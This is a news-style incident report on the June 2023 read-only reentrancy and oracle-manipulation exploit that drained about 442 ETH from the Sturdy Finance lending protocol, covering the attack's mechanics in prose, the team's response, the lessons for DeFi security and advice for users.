Sturdy Finance Drained of $800K in Read-Only Reentrancy Exploit

The decentralized finance ecosystem suffered another blow on June 12, 2023, as Sturdy Finance, an Ethereum-based lending protocol, fell victim to a sophisticated reentrancy attack that siphoned approximately 442 ETH, worth roughly $800,000 at the time. The exploit, executed at 01:06:35 AM UTC in block 17460610, leveraged a combination of read-only reentrancy and price oracle manipulation to drain the protocol’s liquidity pools. With Bitcoin trading at approximately $25,902 and Ethereum at $1,742 at the time of the attack, the stolen funds represented a significant loss for a mid-sized DeFi platform operating in an already tense market environment shaped by the SEC’s recent enforcement actions against Binance and Coinbase.

The Exploit Mechanics

The attacker launched the assault by taking out a massive flash loan of 110,000 ETH, providing the capital necessary to manipulate market conditions without any collateral. The core vulnerability existed in the price calculation of B-wst-ETH, a composite token representing various assets within Balancer’s B-stETH-STABLE pool. By exploiting a read-only reentrancy flaw in the smart contract system, the attacker artificially inflated the price of B-wst-ETH from approximately 1 ETH to 3 ETH. This inflated price was then fed into Sturdy Finance’s price oracle, causing the protocol to severely overvalue the attacker’s collateral. The attacker deposited the artificially inflated B-wst-ETH tokens as collateral and borrowed WETH against this manipulated valuation. This operation was executed five times within a single transaction, with five distinct smart contracts deployed specifically for the attack. The Balancer Vault reentrancy vulnerability, which had been identified in February 2023 but apparently not fully mitigated across all dependent protocols, served as the gateway for this exploit.

Affected Systems

The attack directly impacted Sturdy Finance’s lending pools, which allow lenders to earn yield from farming profits generated by borrowers. Unlike traditional lending protocols where lenders only earn from interest rates, Sturdy’s unique model made the exploit particularly damaging, as the manipulated collateral values affected multiple yield strategies simultaneously. The attacker systematically drained the pool’s balance through the five deployed contracts, forcing Sturdy Finance’s contract to liquidate collateral in an attempt to minimize losses. Ultimately, the protocol was left with only 11 ETH in the affected pool. The exploit also exposed the interconnected risks within DeFi, as the vulnerability originated in Balancer’s infrastructure but manifested in Sturdy Finance’s protocol. Within minutes of the initial attack, at 01:08:23 AM UTC, the attacker began funneling stolen funds through Tornado Cash, the sanctioned cryptocurrency mixer, making recovery efforts exceedingly difficult.

The Mitigation Strategy

Sturdy Finance responded to the attack by 09:19 AM UTC on the same day, issuing a public acknowledgment of the breach. By 08:25:35 PM UTC, the team had sent an on-chain message to the attacker, proposing a white-hat bounty deal: $100,000 in exchange for the return of remaining stolen funds, along with a promise of no legal action. This approach, while common in DeFi security incidents, highlights the limited recourse available to protocols once funds have been moved through privacy tools like Tornado Cash. The broader mitigation for the DeFi ecosystem involves addressing the root cause: read-only reentrancy vulnerabilities in composability layers. Protocols that depend on external price feeds and shared infrastructure must implement additional safeguards, including independent oracle validation, circuit breakers that halt operations when price movements exceed certain thresholds, and formal verification of reentrancy guards across all external contract interactions.

Lessons Learned

The Sturdy Finance exploit reinforces several critical lessons for the DeFi community. First, composability is a double-edged sword: while shared infrastructure like Balancer enables innovation, it also creates shared vulnerability surfaces. A flaw in one protocol can cascade through the entire ecosystem. Second, flash loans remain a potent weapon for attackers, enabling capital-efficient exploitation that was previously impossible. Third, the speed of DeFi attacks — the entire Sturdy Finance exploit was completed in a single transaction — demands real-time monitoring and automated response systems rather than reactive mitigation. Fourth, price oracle security remains one of the most critical attack vectors in DeFi, and protocols must implement multi-oracle architectures with sanity checks and deviation thresholds.

User Action Required

For users who had funds deposited in Sturdy Finance, the immediate priority is to assess exposure to the affected pools and withdraw from any remaining active positions until the protocol confirms that all vulnerabilities have been patched. More broadly, DeFi users should evaluate their exposure to protocols that rely on single oracle sources or that have dependencies on recently compromised infrastructure. Diversifying across multiple protocols with different risk profiles, maintaining awareness of smart contract audit reports, and monitoring on-chain activity through tools like EigenPhi and Phalcon can provide early warning of potential exploits. In a market where Bitcoin hovers near $26,000 and regulatory pressure from the SEC continues to reshape the landscape, vigilance in DeFi security has never been more important.

Disclaimer: This article is for informational purposes only and does not constitute financial advice. Always conduct your own research before engaging with DeFi protocols.